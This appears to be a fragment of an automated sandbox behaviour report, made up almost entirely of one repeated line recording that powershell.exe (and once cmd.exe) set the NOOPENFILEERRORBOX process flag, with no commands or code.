        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
